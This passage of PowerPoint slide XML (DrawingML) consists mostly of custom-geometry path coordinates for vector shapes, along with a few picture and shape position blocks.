                    <a:pt x="205189" y="603068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131089" y="578185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="578185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112368" y="571899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="571899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="571428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111554" y="571428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="564925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144287" y="564925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189432" y="555956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189432" y="550512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="550512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="545069"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="205189" y="603068"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="203520" y="603369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206798" y="603608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205189" y="603068"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="424932" y="563419"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="205189" y="603068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206798" y="603608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276867" y="603608"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438175" y="574503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438175" y="568961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424932" y="568961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424932" y="563419"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="112368" y="571899"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="116882" y="578185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="573415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112368" y="571899"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="116882" y="573415"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="116882" y="578185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131089" y="578185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="573415"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="116882" y="571899"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="112368" y="571899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="573415"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="571899"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="116882" y="564925"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="111554" y="571428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="570370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="564925"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="116882" y="570370"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="111554" y="571428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="571428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="570370"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="144287" y="564925"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="116882" y="564925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116882" y="570370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144287" y="564925"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="428449" y="562784"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="424932" y="563419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424932" y="568961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429827" y="563101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429339" y="563101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428449" y="562784"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="438175" y="562435"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="430383" y="562435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424932" y="568961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438175" y="568961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438175" y="562435"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="424932" y="561533"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="424932" y="563419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428449" y="562784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424932" y="561533"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="424932" y="556854"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="424932" y="561533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429339" y="563101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424932" y="556854"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="430091" y="562784"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="429115" y="562784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429339" y="563101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429827" y="563101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430091" y="562784"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="438175" y="556854"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="424932" y="556854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429115" y="562784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="428449" y="562784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430383" y="562435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438175" y="562435"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438175" y="556854"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="430383" y="562435"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="428449" y="562784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430091" y="562784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430383" y="562435"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="373299" y="529088"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="333757" y="529088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337480" y="529296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335585" y="529739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424932" y="561533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424932" y="556854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438175" y="556854"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438175" y="552174"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373299" y="529088"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="511693" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="90652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="543027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25731" y="556277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97979" y="543463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29803" y="543463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25619" y="542831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27817" y="542441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21100" y="538982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="538982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9650" y="533086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="533086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="102736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7775" y="102736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="96210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44612" y="96210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510336" y="13700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508614" y="13029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="13029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="10385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="511693" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="181524" y="544009"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="176189" y="545069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="550512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181524" y="544009"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="189432" y="544009"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="181524" y="544009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="550512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189432" y="550512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189432" y="544009"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="189432" y="521686"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="176189" y="521686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183966" y="528212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="529592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="545069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181524" y="544009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189432" y="544009"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189432" y="521686"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="27817" y="542441"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25619" y="542831"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29803" y="543463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27817" y="542441"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="189432" y="513776"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="27817" y="542441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29803" y="543463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="97979" y="543463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="529592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="521686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189432" y="521686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189432" y="513776"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="9650" y="533086"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="13243" y="538982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="534936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9650" y="533086"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="13243" y="534936"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="13243" y="538982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21100" y="538982"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="534936"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="525120" y="453305"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="312076" y="491937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312076" y="535230"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="335585" y="529739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333757" y="529088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="373299" y="529088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367078" y="526875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325319" y="526875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317197" y="520418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325319" y="518521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325319" y="503998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319884" y="503998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325319" y="497472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355873" y="497472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="464379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="458845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525120" y="458845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525120" y="453305"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="13243" y="533086"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9650" y="533086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="534936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="533086"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="333757" y="529088"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="335585" y="529739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337480" y="529296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333757" y="529088"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="176189" y="521686"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="176189" y="529592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183966" y="528212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176189" y="521686"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="325319" y="518521"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="317197" y="520418"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325319" y="526875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325319" y="518521"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="336359" y="515944"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="325319" y="518521"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325319" y="526875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367078" y="526875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="336359" y="515944"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="325319" y="497472"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="319884" y="503998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325319" y="503012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325319" y="497472"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="325319" y="503012"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="319884" y="503998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325319" y="503998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325319" y="503012"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="355873" y="497472"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="325319" y="497472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325319" y="503012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="355873" y="497472"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="530563" y="452318"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="525120" y="453305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525120" y="458845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530563" y="452318"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="538363" y="452318"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="530563" y="452318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525120" y="458845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="458845"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="452318"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="525120" y="19456"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="525120" y="453305"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="530563" y="452318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="452318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="21100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529343" y="21100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525120" y="19456"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="13243" y="96210"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7775" y="102736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="101768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="96210"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="13243" y="101768"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7775" y="102736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="102736"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="101768"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="44612" y="96210"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="13243" y="96210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13243" y="101768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44612" y="96210"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="525120" y="14920"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="525120" y="19456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529343" y="21100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525120" y="14920"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="538363" y="14920"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="525120" y="14920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529343" y="21100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="21100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="14920"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="538363" y="13029"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="508614" y="13029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512169" y="13375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="510336" y="13700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525120" y="19456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525120" y="14920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="14920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538363" y="13029"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="538479" h="617220">
                  <a:moveTo>
                    <a:pt x="508614" y="13029"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="510336" y="13700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512169" y="13375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508614" y="13029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FED8B4E3-CB95-0093-D87C-CCE334D140E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7095" y="3724114"/>
              <a:ext cx="398449" cy="407026"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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ACE9A346-7DA0-7294-F7BD-F99B6E814CEE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5802315" y="2638431"/>
              <a:ext cx="66040" cy="356870"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="66039" h="356869">
                  <a:moveTo>
                    <a:pt x="15567" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1151"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49584" y="347281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="65727" y="356495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15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4" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{350AAE46-3AA4-3265-886C-620826C973B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14422" y="2560106"/>
              <a:ext cx="505643" cy="432517"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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A0A56A2C-8266-C4D5-AA90-AB6C17F8DCBB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5810500" y="2556090"/>
              <a:ext cx="513715" cy="440690"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="460004" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="80675"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54069" y="440534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80354" y="436019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60386" y="436019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="56379" y="433124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59861" y="432526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7931" y="86895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4520" y="86895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7343" y="82978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26850" y="82978"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454196" y="8031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="453677" y="4522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460673" y="4522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="460004" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="59861" y="432526"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="56379" y="433124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60386" y="436019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59951" y="433124"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59861" y="432526"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="505649" y="355947"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="59861" y="432526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="60386" y="436019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80354" y="436019"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513478" y="361617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513134" y="359291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506144" y="359291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505649" y="355947"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="508981" y="355374"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="505649" y="355947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506144" y="359291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="508981" y="355374"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="512555" y="355374"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="508981" y="355374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506144" y="359291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513134" y="359291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512639" y="355947"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="512555" y="355374"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="513714" h="440689">
                  <a:moveTo>
                    <a:pt x="460673" y="4522"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="453677" y="4522"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457698" y="7417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="454196" y="8031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505565" y="355374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="505649" y="355947"/>
                  </a:lnTo>
                  <a:lnTo>
